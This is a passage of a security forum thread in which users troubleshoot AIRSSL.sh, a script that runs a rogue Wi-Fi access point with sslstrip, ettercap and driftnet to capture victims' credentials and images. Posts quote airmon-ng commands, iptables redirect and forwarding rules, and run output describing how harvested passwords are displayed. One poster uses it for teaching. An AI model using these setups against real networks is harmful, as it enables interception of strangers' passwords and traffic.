Page 2 of 9
Results 11 to 20 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #11
    Just burned his ISO
    Join Date
    May 2010
    Posts
    7

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    this script needs work. at0 interface is hardcoded everywhere

  2. #12
    Just burned his ISO
    Join Date
    May 2010
    Posts
    7

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    actually, my bad. at0 is made by airbase.
    Nevermind.

    Script works, I added

    airmon-ng stop mon0
    airmon-ng stop $fakeap_interface

    after iptables --table nat --delete-chain

  3. #13
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I'm trying this script on Ubuntu; I think there are no differences. dhcp started manually says it can't read the config file. I've tried to make it 777 but same error, permission denied. Any clue?

  4. #14
    Just burned his ISO
    Join Date
    May 2010
    Posts
    6

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by alex88 View Post
    I'm trying this script on Ubuntu; I think there are no differences. dhcp started manually says it can't read the config file. I've tried to make it 777 but same error, permission denied. Any clue?

    I believe you are referring to the /var/run/dhcpd.pid file. Try setting the permissions on the /var/run folder.

  5. #15
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Linux flavor should not matter, providing the other modules can be called. The script forcefully creates a working directory to use, then writes its own dhcpd conf file. It should (and does for me) work fine with the permission denied error.

    Quote Originally Posted by lonypny View Post
    this script needs work. at0 interface is hardcoded everywhere


    Quote Originally Posted by mrkazu View Post
    Hi, nice script, however i had to add two lines to get it to work for me (red text is the new line)

    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID


    airmon-ng start $fakeap_interface
    fakeap_interface="mon0"


    might help someone else having trouble with it

    Does airbase-ng not create a virtual dev itself?
    Anyhow, thanks for the contribution, hopefully it helps more users. However, I don't think the script should be changed, because changing the fakeap_interface variable to a constant, that being mon0, will cause other problems, i.e. when mon0 is not what is created.

    UPDATE: AIRSSL 2.0 now uses the rtl8187 driver and thus uses mon0. It would be a smart idea to make sure mon0 is being used solely for this script and doesn't have much else going on.
    Last edited by killadaninja; 11-20-2010 at 06:52 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #16
    Junior Member
    Join Date
    Aug 2009
    Posts
    37

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    When I run it everything initiates but the fake AP essid is hidden?
    I get this error message when DHCP starts
    Can't create PIDfile /var/run/dhcpd.pid: permission denied.
    Also does the etter.conf file have to be default or with the comments removed?
    Thanks.

  7. #17
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    3

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, I just want to start by saying thank you killadaninja for making such a nice script. However, I'm having some trouble acquiring an IP address on my 'victim' machine and it ends up giving me limited or no connectivity. Here is what I am running.

    Code:
    root@bt:~# netstat -nr
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
    192.168.0.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0
    0.0.0.0         192.168.0.1     0.0.0.0         UG        0 0          0 eth0
    root@bt:~# ./airssl.sh
    
    AIRSSL 1.0 - killadaninja
    
    Enter the networks gateway IP address, for example 192.168.1.254: 192.168.0.1
    Enter your interface thats connected to the internet, for example wlan0: eth0
    Enter your interface to be used for the fake AP, for example wlan1: wlan0
    Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: Test
    [+] Configuring FakeAP....
    
    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, choose n if your are unsure... y or n
    n
    
    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...
    
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n
    n
    
    [+] Starting ettercap...
    
    [+] Driftnet?
    
    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n
    n
    
    
    
    [+] Activated...
    Airssl is now running, after victim connects and surfs, their credentials
    will be displayed in ettercap. You may use right/left mouse buttons
    to scroll up/down ettercaps xterm shell, ettercap will also save its output
    to /pentest/wireless/airssl/passwords unless you stated otherwise.
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata
    
    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR
    Thanks in advance

    Jonathan
    Last edited by JoniBrook; 06-18-2010 at 02:35 PM. Reason: Typo

  8. #18
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by {LCD}STELIOS View Post
    When I run it everything initiates but the fake AP essid is hidden?
    I get this error message when DHCP starts
    Can't create PIDfile /var/run/dhcpd.pid: permission denied.
    Also does the etter.conf file have to be default or with the comments removed?
    Thanks.

    I cannot understand, after having a quick look, why the fake AP essid would be hidden, makes no sense.
    As for PID files, they're useless imho and, at least in this circumstance, definitely not needed.
    etter.conf should be default, I have added this to my original post, thank you.



    Quote Originally Posted by JoniBrook View Post
    Hi, I just want to start by saying thank you killadaninja for making such a nice script. However, I'm having some trouble acquiring an IP address on my 'victim' machine and it ends up giving me limited or no connectivity. Here is what I am running.

    Thanks in advance

    Jonathan

    Is the victim a virtual machine? If the victim is a physical box then what OS is it running? If it is Windows then run the script and connect as usual; whilst all is up and running, on the Linux machine do an "ifconfig", and on the Windows box do an "ipconfig /all", and print both results here so we can see what's going on.
    Thank you for taking the time to say thanks.

    PS: your etter.conf is original, correct? Maybe you altered your etter.conf to tell it to ipforward?
    Last edited by killadaninja; 06-18-2010 at 11:11 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  9. #19
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    1

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello,

    I have been able to set it up and get it to work at home. However, when I'm trying to show a demonstration to my students in the lab, I am not able to access the internet from the client laptop.

    I tried removing the line:
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I am still unable to access the internet. And when I sniff the network with wireshark I get an ICMP packet right after the DNS query that looks like this:
    Code:
    Source            Destination         Protocol      Info
    10.0.0.28         10.0.0.1            DNS           Standard query A google.com
    10.0.0.1          10.0.0.28           ICMP          Destination Unreachable (Port unreachable)
    I've searched around and found different iptables forwarding options which seem to bypass this issue:
    Code:
    sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
    iptables -X
    iptables -F
    iptables -A FORWARD -i wlan0 -o eth0 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    from: http://www.backtrack-linux.org/forum...lan0-eth0.html

    This allowed me to connect to the fake access point and get transparent access to the internet. However, sslstrip did not work obviously since it monitors port 10000.

    I have tried sslstrip to monitor port 443 but that did not work either. I'm sure there is something I am missing. I'm not very well versed in iptables where I think the problem could be (and where it could be fixed).

    Is there a way to get sslstrip to work with this iptables set up? Or do you recommend I bridge at0 and wlan1 (internet access device) as an alternate solution (if that would even work)?
    Last edited by ntheother; 07-08-2010 at 01:46 PM.

  10. #20
    Just burned his ISO
    Join Date
    Jul 2010
    Location
    In a tree
    Posts
    4

    Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Everything works except for the DHCP. I added the two lines in the script, and still can't get an IP.
    If I look at the packet traffic in the wireless settings, I can see that it's receiving anything ...

    Even if the DHCP server seems to send him an IP.

    My router is a Netgear also set to be a DHCP. May it cause trouble?

    Can someone help me?

    Thanks
